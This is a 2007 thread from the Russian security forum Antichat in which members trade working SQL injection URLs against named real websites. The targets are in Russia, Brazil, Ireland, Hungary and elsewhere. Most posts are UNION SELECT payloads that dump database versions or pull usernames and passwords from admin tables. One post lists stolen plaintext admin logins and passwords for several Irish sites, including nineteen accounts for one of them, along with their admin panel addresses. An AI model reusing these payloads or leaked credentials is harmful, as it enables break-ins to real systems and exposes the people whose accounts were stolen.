HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.12.2007, 18:26
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215

Репутация: 86
По умолчанию

Код:
http://www.vikinggames.hu/product.php?id=-1+union+select+1,table_name,version(),4,user(),6,7+from+information_schema.tables/*
5.0.32-Debian_7etch1-log
viking1@localhost
 
Ответить с цитированием

  #2  
Старый 29.12.2007, 19:08
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

http://www.prosambo.com/index.php?razdel=news&id=-51+union+select+1,2,3,4,5,6,7/*
5.0.45
----------------------------------------------------------------------
http://inforos.ru/?idth=-21+union+select+1/*
5.0.45-log
http://inforos.ru/?idth=-21+union+select+concat(login,0x3a,pass)+from+infor os_manager+limit+0,1/*
----------------------------------------------------------------------
http://www.infoshos.ru/?idn=9999+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4 ,5,6,7,8,9,0,1,2/*
5.0.45
----------------------------------------------------------------------
http://www.amur-trassa.ru/?id=-15+union+select+1,2,3,4,5,6,7,8/*
5.0.45
----------------------------------------------------------------------
http://www.abelmot.ru/?module=catalog&c_id=-2+union+select+1,2,table_name,4,5,6+from+informati on_schema.tables/*
5.0.45
 
Ответить с цитированием

  #3  
Старый 29.12.2007, 19:37
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.tvaparecida.com.br/

Код:
http://www.tvaparecida.com.br/programas.php?id=-1+union+select+1,concat_ws(0x3a,USERNAME,USERPASS,EMAIL),3,4+from+TB_LOGIN+limit+0,1/*
http://www.ibict.br/

Код:
http://www.ibict.br/noticia.php?id=-1+union+select+convert(version()+using+latin1),2/*
 
Ответить с цитированием

  #4  
Старый 29.12.2007, 21:14
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.wcasi.com/programs.php?id=-9+union+select+1,2,3,VERSION(),5,6,7,8,9,10,11,12/*
Код:
http://www.ssuexed.com/programs.php?id=-112+union+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9+from+users/*

Последний раз редактировалось SWAT; 29.12.2007 в 21:27..
 
Ответить с цитированием

  #5  
Старый 29.12.2007, 23:31
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
По умолчанию

Цитата:
админку не нащёл
а это что -
Цитата:
http://www.selena-stroymash.ru/admin
 
Ответить с цитированием

  #6  
Старый 30.12.2007, 02:21
Loker
Познающий
Регистрация: 25.10.2007
Сообщений: 69
Провел на форуме:
348179

Репутация: 52
По умолчанию

http://battle8.hip-hop.ru/index.php?mode=articles&id=-6+union+select+1,2/*

Последний раз редактировалось Loker; 30.12.2007 в 03:04..
 
Ответить с цитированием

  #7  
Старый 30.12.2007, 12:51
5taY3r
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576

Репутация: 100
По умолчанию

Цитата:
Сообщение от Loker  
http://battle8.hip-hop.ru/index.php?mode=articles&id=-6+union+select+1,2/*
2Loker
Код:
http://battle8.hip-hop.ru/index.php?mode=articles&id=-6+union+select+aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71),2/**
4.1.18:battle8i@localhost:battle8
 
Ответить с цитированием

sql
  #8  
Старый 30.12.2007, 02:52
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql

Цитата:
http://battle8.hip-hop.ru/index.php?mode=articles&id=-6+union+select+1,2/*

Народ напишите в Пм кто раскрутить может помочь..
так навскидку видно, что есть кое-чего -
Цитата:
http://battle8.hip-hop.ru/index.php?mode=articles&id=6+union+select+1,concat _ws(0x3a,id,name,email)+from+users/*
 
Ответить с цитированием

  #9  
Старый 30.12.2007, 03:25
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.pitty.com.br/

Код:
http://www.pitty.com.br/blog.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),version(),data   base()),4,5/*
http://www.undime.org.br/

Код:
http://www.undime.org.br/htdocs/index.php?id=-1'+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
http://www.fesppr.br/

Код:
http://www.fesppr.br/cient/publicacoes.php?id=-1'+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4+from+admin/*

Последний раз редактировалось Ded MustD!e; 30.12.2007 в 03:36..
 
Ответить с цитированием

  #10  
Старый 30.12.2007, 06:27
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.propertysaleorrent.ie/

Код:
http://www.propertysaleorrent.ie/detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+admin/*
Админка: http://www.propertysaleorrent.ie/admin/

login: chamlis
pass: amalkne

http://www.chambers.ie/

Код:
http://www.chambers.ie/index.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+admin/*
Админка: http://www.chambers.ie/admins/

Админов аж 19 штук)))

» caoimhe : policy
» anna : letannain
» pauline : polexecpa
» grainne.oreilly : merrion
» RMM : goodRMM07
» ciara : watercress
» brett : bw325815
» susan : corppatrons
» marion : offmancsp
» richard : headcsp
» kate : projects
» barry : projects2
» Megan : commercial
» james.dunne : teddyBear
» jessica : jdempsey
» AMAS : amas07
» james : jkiernan
» annmcarroll : cahercon
» support : secureRMM07

http://www.explore.ie/

Код:
http://www.explore.ie/ireland/article.php?ID=-1+union+select+concat_ws(0x3a,user(),version(),database())/*
вывод в тайтле

http://www.andrewmoore.ie/

От этого сайта просто в восторге) долго искал, где же выводятся данные, оказалось в текстовом поле "Message:" в ссылке в ее параметре id=.

Код:
http://www.andrewmoore.ie/friend.php?id=-1+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+admin/*
Админка: http://www.andrewmoore.ie/admin/

login: andrewmoore
pass: 194rew803

http://www.camping-ireland.ie/

Код:
http://www.camping-ireland.ie/caravan-parks/camping.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database())+from+admin/*
для тех, кто подберет колонки, админка: http://www.camping-ireland.ie/caravan-parks/login.html

Последний раз редактировалось Ded MustD!e; 30.12.2007 в 07:22..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.